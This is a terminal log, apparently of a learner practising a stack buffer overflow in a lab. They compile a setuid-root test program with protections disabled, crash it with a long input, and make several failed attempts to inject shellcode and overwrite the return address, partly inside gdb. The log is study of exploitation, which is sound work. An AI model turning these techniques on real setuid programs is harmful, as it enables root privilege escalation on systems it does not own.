[sudo] password for tomovic:
root@tomovic-Satellite-L300:~#
root@tomovic-Satellite-L300:~#
root@tomovic-Satellite-L300:~# cd ..
root@tomovic-Satellite-L300:/# cd home/
root@tomovic-Satellite-L300:/home# cd tomovic/
root@tomovic-Satellite-L300:/home/tomovic# cd Dok
-su: cd: Dok: Datei oder Verzeichnis nicht gefunden
root@tomovic-Satellite-L300:/home/tomovic# cd Dokumente/
root@tomovic-Satellite-L300:/home/tomovic/Dokumente# cd hack/
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o update_info update_info.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chown root ./update_info
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chmod u+s ./update_info
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info
Usage: ./update_info <id> <description>
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info OCP209 "Enforcement Droid"
[DEBUG]: desc argument is at 0xbffff8db
Updating product #OCP209 with description 'Enforcement Droid'
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info $(perl -e 'print "AAAA"x10') blah
[DEBUG]: desc argument is at 0xbffff8e8
Speicherzugriffsfehler (Speicherabzug geschrieben)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info $(perl -e 'print "\xf2\xf9\xff\xbf"x10') $(cat ./shellcode.bin)
Fatal: description argument can only contain printable bytes
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./update_info
Reading symbols from /home/tomovic/Dokumente/hack/update_info...done.
(gdb) run $(perl -e 'print "/xcb/xf9/xff/xbf"x10') blah
Starting program: /home/tomovic/Dokumente/hack/update_info $(perl -e 'print "/xcb/xf9/xff/xbf"x10') blah
Fatal: id argument must be less than 40 bytes
[Inferior 1 (process 3146) exited with code 01]
(gdb) i r eip
The program has no registers now.
(gdb) ^CQuit
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info $(perl -e 'print "\xf2\xf9\xff\xbf"x5') $(cat ./shellcode.bin)
Fatal: description argument can only contain printable bytes
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./update_info
Reading symbols from /home/tomovic/Dokumente/hack/update_info...done.
(gdb)